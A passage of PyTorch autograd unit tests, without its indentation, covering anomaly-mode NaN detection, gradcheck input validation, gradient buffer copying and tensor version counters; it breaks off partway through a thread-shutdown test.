with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
out.backward()
self.assertIn('No forward pass information', str(w[0].message))
inp = torch.rand(size, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, "Function 'MyFuncBackward' returned nan values in its 1th output."):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
out = MyFunc.apply(inp, inp, False)
out.backward()
self.assertIn('MyFunc.apply', str(w[0].message))
def test_nested_anomaly_detect_nan(self):
size = 10
class MyFunc(Function):
@staticmethod
def forward(ctx, inp1, fail_0th):
ctx.fail_0th = fail_0th
ctx.save_for_backward(inp1)
return inp1.sum(0, keepdim=True)
@staticmethod
def backward(ctx, gO):
inp, = ctx.saved_tensors
fail_0th = ctx.fail_0th
g = gO.clone().expand(size)
gI = MyFunc2.apply(g * inp, g + inp, fail_0th)
return gI, None
class MyFunc2(Function):
@staticmethod
def forward(ctx, inp1, inp2, fail_0th):
ctx.fail_0th = fail_0th
return inp1 * 2.0 + inp2
@staticmethod
def backward(ctx, gO):
fail_0th = ctx.fail_0th
g1 = gO.clone()
g2 = gO.clone()
g1[0] = 0
g2[0] = 0
# generate a nan
if fail_0th:
g1[0] /= 0
else:
g2[0] /= 0
return g1, g2, None
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, True)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
gsum.backward() # should not fail
inp = torch.rand(size, requires_grad=True)
out = MyFunc.apply(inp, True)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
with detect_anomaly():
gsum.backward()
self.assertIn('No forward pass information', str(w[1].message))
inp = torch.rand(size, requires_grad=True)
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 1th output."):
with detect_anomaly():
out = MyFunc.apply(inp, False)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
gsum = ginp.sum()
gsum.backward()
self.assertIn('MyFunc2.apply', str(w[1].message))
self.assertIn('MyFunc.apply', str(w[2].message))
def test_anomaly_grad_warnings(self):
# PyTorch won't raise warnings as errors when an error is already being raised,
# but we'd at least want to see them in stderr
class StdErrDiverter:
def __enter__(self):
self.stderr_orig = sys.stderr
self.stderr_new = io.StringIO()
sys.stderr = self.stderr_new
return self
def __exit__(self, *args):
self.captured = self.stderr_new.getvalue()
sys.stderr = self.stderr_orig
# if the warnings don't throw, they will be handled as regular warnings
with self.assertRaisesRegex(RuntimeError,
"one of the variables needed for gradient computation has been "
"modified by an inplace operation"):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
a = torch.randn(5, requires_grad=True)
d1 = a + 1
d2 = d1 ** 2
d1 += 1
torch.autograd.grad(d2.sum(), a)
self.assertEqual(len(w), 2)
self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
self.assertIn('Error detected in PowBackward0', str(w[1].message))
# if the warning throws, it will be printed to sys.stderr
with self.assertRaisesRegex(RuntimeError,
"one of the variables needed for gradient computation has been "
"modified by an inplace operation"):
with warnings.catch_warnings(record=True) as w:
with detect_anomaly():
warnings.simplefilter("error")
with StdErrDiverter() as s:
a = torch.randn(5, requires_grad=True)
d1 = a + 1
d2 = d1 ** 2
d1 += 1
torch.autograd.grad(d2.sum(), a)
self.assertEqual(len(w), 1)
self.assertIn('Anomaly Detection has been enabled', str(w[0].message))
self.assertIn('Error detected in PowBackward0', s.captured)
def test_anomaly_assign_parent_cleanup(self):
# Test that python objects created are properly cleaned up when assign_parent is called
import weakref
def get_ref():
# we use torch.exp here but any function that will construct a new node in its
# backward call in grad mode will work
x = torch.randn(2, 2, requires_grad=True)
t = x.exp()
# ExpBackward calls mul, creating the MulBackward node when create_graph=True.
# In anomaly mode, a PyObject referencing MulBackward's "parent" ExpBackward is added to
# MulBackward's anomaly metadata dict, creating the following reference chain:
#
# grad -> MulBackward -> PyObject -> ExpBackward
#
with detect_anomaly():
grad = torch.autograd.grad(t, x, torch.ones_like(t), create_graph=True)
# We add a weak reference to a new Foo object, which we insert into ExpBackward's metadata dict
#
# (PyObject) -> ExpBackward -> dict -> *Foo*
# t ----^ WeakRef ---^
#
# We want to test that when grad goes out of scope at the end of this function, that PyObject is destroyed.
# We can test this by checking that Foo is no longer kept alive once t is destroyed
class Foo(object):
pass
my_obj = Foo()
meta_dict = t.grad_fn.metadata
meta_dict[0] = my_obj
ref = weakref.ref(my_obj)
return t, ref
t, ref = get_ref()
self.assertIsNotNone(ref())
del t
self.assertIsNone(ref())
def test_nested_anomaly_printstack_cleanup(self):
# Test if metadata dict PyObject is properly destroyed
import weakref
def get_ref():
# This is similar to the construction in test_anomaly_assign_parent_cleanup:
#
# MyFuncBackward2 -> PyObject -> MyFuncBackward -> dict -> Foo
# out ---^ WeakRef ---^
#
# We want to check that Foo is still properly destroyed even when MyFunc2Backward's
# AnomalyMetadata calls printstack, which does some python object manipulation.
#
# You might be wondering why we still need test_anomaly_assign_parent_cleanup,
# since if the PyObject were not destroyed here, wouldn't this test detect that too?
# The answer is that a custom function's PyObject (THPFunction) actually only holds
# a weak reference to the C++ node!
class MyFunc(Function):
@staticmethod
def forward(ctx, x):
ctx.save_for_backward(x)
return x
@staticmethod
def backward(ctx, gO):
x, = ctx.saved_tensors
return MyFunc2.apply(x)
class MyFunc2(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, gO):
return gO + float("NaN")
inp = torch.rand(1, requires_grad=True)
out = MyFunc.apply(inp)
ginp, = torch.autograd.grad(out, (inp,), create_graph=True)
with warnings.catch_warnings(record=True) as w:
with self.assertRaisesRegex(RuntimeError, "Function 'MyFunc2Backward' returned nan values in its 0th output."):
with detect_anomaly():
ginp.backward()
class Foo(object):
pass
my_obj = Foo()
meta_dict = out.grad_fn.metadata
meta_dict[0] = my_obj
ref = weakref.ref(my_obj)
return out, ref
t, ref = get_ref()
self.assertIsNotNone(ref())
del t
self.assertIsNone(ref())
# TODO: update these tests to use the linalg module and move to test_linalg.py
@skipIfNoLapack
def test_eig_no_eigenvectors(self):
A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
w, v = torch.eig(A, eigenvectors=False)
with self.assertRaisesRegex(RuntimeError, 'is not differentiable'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_eig_complex_eigenvalues(self):
A = torch.tensor([[0., -1.], [1., 0.]], dtype=torch.float32, requires_grad=True)
w, v = torch.eig(A, eigenvectors=True)
with self.assertRaisesRegex(RuntimeError, 'does not support complex eigenvalues'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_symeig_no_eigenvectors(self):
A = torch.tensor([[1., 2.], [2., 4.]], dtype=torch.float32, requires_grad=True)
w, v = torch.symeig(A, eigenvectors=False)
with self.assertRaisesRegex(RuntimeError, 'is not differentiable'):
torch.autograd.backward([w, v], [torch.ones_like(w), torch.ones_like(v)])
@skipIfNoLapack
def test_svd_no_singularvectors(self):
A = torch.randn(2, 2, dtype=torch.float32, requires_grad=True)
u, s, v = torch.svd(A, compute_uv=False)
with self.assertRaisesRegex(RuntimeError, 'cannot compute backward'):
torch.autograd.backward([u, s, v], [torch.ones_like(u), torch.ones_like(s), torch.ones_like(v)])
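# The engine may hand the incoming gradient buffer to at most one of the two
# accumulating leaves without copying; the two leaves must never end up
# sharing a buffer (see the data_ptr assertions below).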
def test_no_grad_copy(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad.data_ptr()
return grad, grad
class NonContGradFunc(Function):
@staticmethod
def forward(ctx, inp1):
ctx.size = inp1.size()
return torch.tensor([1.])
@staticmethod
def backward(ctx, grad):
return torch.ones(1).expand(ctx.size)
a = torch.randn(5, 6, requires_grad=True)
b = torch.randn(5, 6, requires_grad=True)
# non-contiguous grad should be copied
NonContGradFunc.apply(MyFunc.apply(a, b)).backward()
self.assertFalse(a.grad.data_ptr() == MyFunc.static_grad_ptr)
self.assertFalse(b.grad.data_ptr() == MyFunc.static_grad_ptr)
# test case that should trigger no copy for one of a,b
a.grad = b.grad = None
MyFunc.apply(a, b)[1][0].backward()
p_g = MyFunc.static_grad_ptr
p_a = a.grad.data_ptr()
p_b = b.grad.data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# check one of them is using the computed buffer
self.assertTrue(p_a == p_g or p_b == p_g)
def test_no_grad_copy_sparse(self):
# create autograd function that saves grad pointer as class static
class MyFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
MyFunc.static_grad_ptr = grad._values().data_ptr()
return grad, grad
class NonContGradFunc(Function):
static_grad_ptr = None
@staticmethod
def forward(ctx, inp1, inp2):
return inp1 + inp2
@staticmethod
def backward(ctx, grad):
# Create a sparse tensor with non-contiguous indices and values
# and return as grad.
v = torch.rand(1, 3)
i = torch.ones(1, 1, dtype=torch.long)
nv = v.expand(8, 3)
ni = i.expand(1, 8)
ngrad = torch.sparse.FloatTensor(ni, nv, torch.Size([10, 3]))
NonContGradFunc.static_grad_ptr = ngrad._values().data_ptr()
return ngrad, ngrad
a = torch.randn(10, 3, requires_grad=True)
b = torch.randn(10, 3, requires_grad=True)
input = torch.tensor([1, 2, 4, 5, 4, 3, 2, 9])
offsets = torch.tensor([0, 4])
import torch.nn.functional as F
# test case that should trigger no copy for one of a,b
emb_matrix = MyFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
loss.backward(retain_graph=True)
p_g = MyFunc.static_grad_ptr
p_a = a.grad._values().data_ptr()
p_b = b.grad._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# check one of them is using the computed buffer
self.assertTrue(p_a == p_g or p_b == p_g)
# Run backwards multiple times to ensure accumulation works.
for i in range(10):
loss.backward(retain_graph=True)
# non-contiguous indices and values, so we should trigger a copy.
a.grad = b.grad = None
emb_matrix = NonContGradFunc.apply(a, b)
loss = F.embedding_bag(emb_matrix, input, offsets, sparse=True).sum()
loss.backward(retain_graph=True)
p_g = NonContGradFunc.static_grad_ptr
p_a = a.grad._values().data_ptr()
p_b = b.grad._values().data_ptr()
# check a,b uses different grad buffer
self.assertFalse(p_a == p_b)
# Verify we cloned both grads.
self.assertFalse(p_a == p_g)
self.assertFalse(p_b == p_g)
# Run backwards multiple times to ensure accumulation works.
for i in range(10):
loss.backward(retain_graph=True)
def test_gradcheck_single_input(self):
def check(fast_mode):
def f(inp):
return inp.mul(5)
gradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
gradgradcheck(f, torch.rand(10, dtype=torch.float64, requires_grad=True), fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_sparse_input(self):
def check(fast_mode):
def fn(sparse):
return torch.sparse.sum(sparse)
gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=True,
check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'gradcheck expects all tensor inputs are dense'):
gradcheck(fn, torch.rand(10, dtype=torch.double).to_sparse().requires_grad_(True), check_sparse_nnz=False,
check_batched_grad=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_nondeterministic(self):
class NonDetFunc(Function):
@staticmethod
def forward(ctx, x, jitter=0.0):
ctx._jitter = jitter
return x
@staticmethod
def backward(ctx, grad_out):
return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None
def check(fast_mode):
inp = torch.randn(5, 5, dtype=torch.double, requires_grad=True)
gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, check_batched_grad=False, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Backward is not reentrant'):
gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, check_batched_grad=False, fast_mode=fast_mode)
gradcheck(lambda x: NonDetFunc.apply(x, 0.0), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
gradcheck(lambda x: NonDetFunc.apply(x, 1e-6), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
gradgradcheck(lambda x: NonDetFunc.apply(x, 1e-12), inp, nondet_tol=1e-5, check_batched_grad=False,
fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_validates_inputs(self):
def check(fast_mode):
# when inputs are not dense, but check_sparse_nnz is false
x = torch.rand(10, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'dense when check_sparse_nnz is set to False.'):
gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False, check_batched_grad=False,
fast_mode=fast_mode)
self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=False,
check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
# when none of the inputs require grad (always raises even if raise_exception=False)
x = torch.rand(10, requires_grad=False)
with self.assertRaisesRegex(ValueError, 'at least one input tensor to require gradient'):
gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
# (warning) when inputs are not double precision
x = torch.ones(1, dtype=torch.float32, requires_grad=True)
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
self.assertTrue(gradcheck(lambda x: x, (x,), atol=1e-1, fast_mode=fast_mode))
# when layout is not mkldnn (aka has strides) and input has a dimension with stride 0 (always raises
# even if raise_exception=False)
x = torch.ones(1, dtype=torch.float64, requires_grad=True)
x = x.expand((2, 2))
with self.assertRaisesRegex(RuntimeError, 'The 0th input has a dimension with stride 0'):
gradcheck(lambda x: x, (x,), raise_exception=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_validates_input_mkldnn(self):
# when the inputs are MKLDNN tensors, forward-mode testing is not allowed
# Tolerances below are relaxed to make sure the gradients match even in single-precision floats
# Use the warning assert to hide the float32 warning
x = torch.ones(1).to_mkldnn().requires_grad_()
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
with self.assertRaisesRegex(ValueError, 'MKLDNN inputs are not support for forward AD gradcheck.'):
gradcheck(lambda x: x.to_dense(), (x,), raise_exception=False, fast_mode=False, check_forward_ad=True,
atol=1e-1, rtol=1e-1)
with self.assertWarnsRegex(UserWarning, "Input #0 requires gradient and is not a double precision"):
with self.assertRaisesRegex(ValueError, 'MKLDNN inputs are not support for forward AD gradcheck.'):
gradcheck(lambda x: x.to_dense(), (x,), raise_exception=False, fast_mode=True, check_forward_ad=True,
atol=1e-1, rtol=1e-1)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_test_outputs(self):
def check(fast_mode):
# when sparse outputs (always raise even if raise_exception=False)
x = torch.rand(10, requires_grad=True).to_sparse()
with self.assertRaisesRegex(ValueError, 'Sparse output is not supported at gradcheck yet'):
gradcheck(lambda x: x, (x,), check_sparse_nnz=True, check_batched_grad=False, raise_exception=False,
fast_mode=fast_mode)
# when mkldnn outputs (always raise even if raise_exception=False)
root = torch.randn(4, 5, dtype=torch.float32, requires_grad=True)
with self.assertRaisesRegex(ValueError, 'MKLDNN output is not supported at gradcheck yet'):
gradcheck(lambda x: x.to_mkldnn(), (root,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_check_no_differentiable_outputs(self):
def check(fast_mode):
# When none of the outputs are differentiable, but numerical gradient is not zero
x = torch.ones((1,), requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'Numerical gradient for function expected to be zero'):
gradcheck(lambda x: torch.tensor([x]), x)
self.assertFalse(gradcheck(lambda x: torch.tensor([x]), x, raise_exception=False, fast_mode=fast_mode))
# succeed when no outputs at all
self.assertTrue(gradcheck(lambda x: (), (x,), fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_check_batched_grad(self):
def check(fast_mode):
x = torch.rand(10, dtype=torch.double, requires_grad=True).to_sparse()
# runtime error while computing batched grad (prints a big error)
with self.assertRaisesRegex(RuntimeError, 'gradcheck or gradgradcheck failed while testing batched gradient'):
gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True, fast_mode=fast_mode)
self.assertFalse(gradcheck(lambda x: x.to_dense(), (x,), check_sparse_nnz=True, check_batched_grad=True,
raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_backward_mul_by_grad_output(self):
# when grad_input is sparse and has incorrect sparse_dim/dense_dim
def check(fast_mode):
def fn(x):
def hook(grad):
if grad is not None:
return grad.to_dense().to_sparse(1)
return grad
y = x.clone()
y.register_hook(hook)
return y.to_dense()
x = torch.ones((2, 2), dtype=torch.double, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'grad is sparse tensor, but has incorrect sparse_dim'):
gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
raise_exception=False, fast_mode=fast_mode))
# when backward not multiplied by grad_output (non-sparse case)
def fn2(x):
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
gradcheck(fn2, (x,), atol=1e-1, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn2, (x,), atol=1e-1, raise_exception=False, fast_mode=fast_mode))
# when backward not multiplied by grad_output (sparse case)
def fn3(x):
y = x.clone().to_dense()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True).to_sparse()
with self.assertRaisesRegex(RuntimeError, 'backward not multiplied by grad_output'):
gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(fn3, (x,), atol=1e-1, check_sparse_nnz=True, check_batched_grad=False,
raise_exception=False, fast_mode=fast_mode))
# when layout of grad_input is not the same as input
class Test(Function):
@staticmethod
def forward(ctx, x):
return x
@staticmethod
def backward(ctx, x):
return x.to_sparse()
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'grad is incorrect layout'):
gradcheck(Test.apply, (x,), check_batched_grad=False, fast_mode=fast_mode)
self.assertFalse(gradcheck(Test.apply, (x,), check_batched_grad=False, raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_undefined_grad(self):
def check(fast_mode):
# when a runtime error is encountered while running backward
def fn(x):
def hook(x):
if x is None:
raise RuntimeError("x is undefined")
y = x.clone()
y.register_hook(hook)
return y
x = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertWarnsRegex(UserWarning, "Backwards compatibility: New undefined gradient support checking feature"):
with self.assertRaisesRegex(RuntimeError, 'Expected backward function to handle undefined output grads'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_jacobian_mismatch(self):
def check(fast_mode):
def fn(x): # R -> R, C -> C
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
x_c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
gradcheck(fn, (x_c,), fast_mode=False)
self.assertFalse(gradcheck(fn, (x_c,), raise_exception=False, fast_mode=False))
def fn2(x): # R -> C
y = torch.complex(x, x)
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(RuntimeError, 'While considering the imaginary part of complex outputs only'):
gradcheck(fn2, (x,), fast_mode=False)
self.assertFalse(gradcheck(fn2, (x,), raise_exception=False, fast_mode=False))
def fn3(x): # C -> R
y = torch.real(x)
y.register_hook(lambda x: x + 1e-2)
return y
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn3, (x_c,), fast_mode=False)
self.assertFalse(gradcheck(fn3, (x_c,), raise_exception=False, fast_mode=False))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_dense_and_sparse_inputs(self):
def check(fast_mode):
def fn(x, y):
return x * y.coalesce().to_dense()
a = torch.rand(2, 2, dtype=torch.double, requires_grad=True)
b = torch.rand(2, 2, dtype=torch.double,).to_sparse().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, b), check_sparse_nnz=True, check_batched_grad=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
@unittest.skipIf(not torch._C.has_mkldnn, "MKL-DNN build is disabled")
def test_gradcheck_multiple_mkldnn_inputs(self):
def check(fast_mode):
def fn(x, y):
return x + y.to_dense()
a = torch.rand(10, requires_grad=True)
b = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, b), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
def fn2(x, y):
return x.to_dense() + y.to_dense()
c = torch.rand(10, dtype=torch.float32).to_mkldnn().requires_grad_(True)
self.assertTrue(gradcheck(fn, (a, c), atol=1e-1, check_batched_grad=False, fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_output_shape_or_dtype_depend_on_values(self):
def check(fast_mode):
def fn(x):
if torch.all(x >= 1):
return torch.cat([x, x])
else:
return x
a = torch.ones(1, dtype=torch.double, requires_grad=True)
with self.assertRaisesRegex(AssertionError, 'return outputs with the same shape when inputs are perturbed'):
self.assertTrue(gradcheck(fn, (a,), fast_mode=fast_mode))
def fn2(x):
if torch.all(x >= 1):
return x.to(torch.float32)
else:
return x
with self.assertRaisesRegex(AssertionError, 'return outputs with the same dtype when inputs are perturbed'):
self.assertTrue(gradcheck(fn2, (a,), fast_mode=fast_mode))
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_complex_non_complex_outputs(self):
def fn(x, y):
z = torch.complex(x, y)
return z, x + 1
a = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.ones(2, 2, requires_grad=True, dtype=torch.float64)
self.assertTrue(gradcheck(fn, (a, b)))
def fn2(z):
return z, torch.real(z)
c = torch.ones(2, 2, requires_grad=True, dtype=torch.complex128)
self.assertTrue(gradcheck(fn2, (c,)))
def test_gradcheck_get_numerical_jacobian(self):
# get_numerical_jacobian is deprecated and no longer used internally by gradcheck
from torch.autograd.gradcheck import get_numerical_jacobian
def fn(inputs):
# get_numerical_jacobian requires fn to take inputs as a tuple
# and returns the jacobian wrt the first output
x = inputs[0]
y = inputs[1]
return 2 * x + y, x + 2 * y
a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
jacobian = get_numerical_jacobian(fn, (a, b), target=a, eps=1e-6)
self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
with self.assertWarnsRegex(UserWarning, "get_numerical_jacobian was part of PyTorch's private API"):
jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6)
self.assertEqual(jacobian[0], 2 * torch.eye(4, dtype=torch.double))
self.assertEqual(jacobian[1], 1 * torch.eye(4, dtype=torch.double))
with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
jacobian = get_numerical_jacobian(fn, (a, b), eps=1e-6, grad_out=2.0)
def test_gradcheck_get_analytical_jacobian(self):
from torch.autograd.gradcheck import get_analytical_jacobian
def fn(x, y):
return 2 * x + y, x + 2 * y
a = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
b = torch.rand(2, 2, requires_grad=True, dtype=torch.float64)
outputs = fn(a, b)
with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a, b), outputs[0])
self.assertEqual(jacobians[0], 2 * torch.eye(4, dtype=torch.double))
self.assertEqual(jacobians[1], 1 * torch.eye(4, dtype=torch.double))
self.assertTrue(reentrant)
class NonDetFunc(Function):
@staticmethod
def forward(ctx, x, jitter=0.0):
ctx._jitter = jitter
return x
@staticmethod
def backward(ctx, grad_out):
return NonDetFunc.apply(grad_out, ctx._jitter) * (1 + torch.rand_like(grad_out) * ctx._jitter), None
outputs = NonDetFunc.apply(a, 1e-6)
with self.assertWarnsRegex(UserWarning, "get_analytical_jacobian was part of PyTorch's private API"):
jacobians, reentrant, correct_grad_sizes, correct_grad_types = get_analytical_jacobian((a,), outputs)
self.assertFalse(reentrant)
with self.assertRaisesRegex(ValueError, "Expected grad_out to be 1.0"):
jacobians, _, _, _ = get_analytical_jacobian((a,), outputs, grad_out=2.0)
def test_gradcheck_custom_error(self):
from torch.autograd.gradcheck import GradcheckError
def check(fast_mode):
def fn(x):
y = x.clone()
y.register_hook(lambda x: x + 1e-2)
return y
x = torch.ones(2, 2, requires_grad=True)
with self.assertRaisesRegex(GradcheckError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, 'Jacobian mismatch for output 0 with respect to input 0'):
gradcheck(fn, (x,), fast_mode=fast_mode)
self.assertFalse(gradcheck(fn, (x,), raise_exception=False, fast_mode=fast_mode))
def fn2(x):
raise RuntimeError("Not a GradcheckError!")
# Checks that when raise_exception=False, non-GradcheckErrors are not caught by gradcheck
with self.assertRaisesRegex(RuntimeError, "Not a GradcheckError!"):
gradcheck(fn2, (x,), fast_mode=fast_mode, raise_exception=False)
check(fast_mode=True)
check(fast_mode=False)
def test_gradcheck_forward_ad(self):
def fn(x, y):
return x + y, y
def bad_fn(x, y):
# Hacky way to check if we're currently inside a forward ad level
is_running_forward_ad = fwAD._current_level >= 0
if is_running_forward_ad:
y_p, y_d = fwAD.unpack_dual(y)
y = fwAD.make_dual(y_p, y_d * 1.1)
return x + y, y
err_msg = "Jacobian computed with forward mode mismatch for output 0 with respect to input 1"
for fast_mode in [True, False]:
# Test for all inputs and outputs being real
x = torch.rand(2, dtype=torch.double, requires_grad=True)
y = torch.rand(2, dtype=torch.double, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
def basic_mul(x):
return torch.view_as_real(torch.resolve_conj(x * 1j))
gradcheck(basic_mul, x, check_forward_ad=True, fast_mode=fast_mode)
# Test for one input and one output being complex
x = torch.rand(2, dtype=torch.cdouble, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
# Test for all inputs and outputs being complex
y = torch.rand(2, dtype=torch.cdouble, requires_grad=True)
gradcheck(fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
with self.assertRaisesRegex(RuntimeError, err_msg):
gradcheck(bad_fn, (x, y), check_forward_ad=True, fast_mode=fast_mode)
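# Version counter semantics: in-place ops bump it, differentiable views share
# it with their base, and `x.data = y` preserves it.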
def test_version_counter(self):
x = torch.randn(1, 2)
# In-place op bumps version
x_saved_version = x._version
x.add_(1).add_(1)
self.assertTrue(x._version > x_saved_version)
# Differentiable view shares version counter
xz = x[:]
self.assertTrue(x._version == xz._version)
xz.add_(1)
self.assertTrue(x._version == xz._version)
# `x.data = y` preserves version counter of `x`
x_saved_version = x._version
x.data = torch.randn(2, 3)
self.assertTrue(x._version == x_saved_version)
x.add_(1)
self.assertTrue(x._version > x_saved_version)
# Make sure `x` is still using the same version counter it shares with `xz`
self.assertTrue(x._version == xz._version)
# In-place op on `xz` also updates version of `x`,
# because they share the version counter
xz.add_(1)
self.assertTrue(x._version == xz._version)
def test_set_data_tensorimpl_type(self):
# Dense tensor has impl of type `TensorImpl`, while sparse tensor has impl
# of type `SparseTensorImpl`.
x = torch.randn(1, 2)
x_s = torch.sparse_coo_tensor(torch.zeros([1, 1]), torch.ones([1]))
with self.assertRaisesRegex(RuntimeError, 'incompatible tensor type'):
x.data = x_s
def test_set_data_preserve_pyobj(self):
a = torch.randn(1, 2)
b = torch.randn(1, 2)
b_id_saved = id(b)
b.data = a
self.assertTrue(b_id_saved == id(b))
@unittest.skipIf(IS_WINDOWS, "Skipping because doesn't work for windows")
def test_thread_shutdown(self):
code = """import torch
from torch.autograd import Function
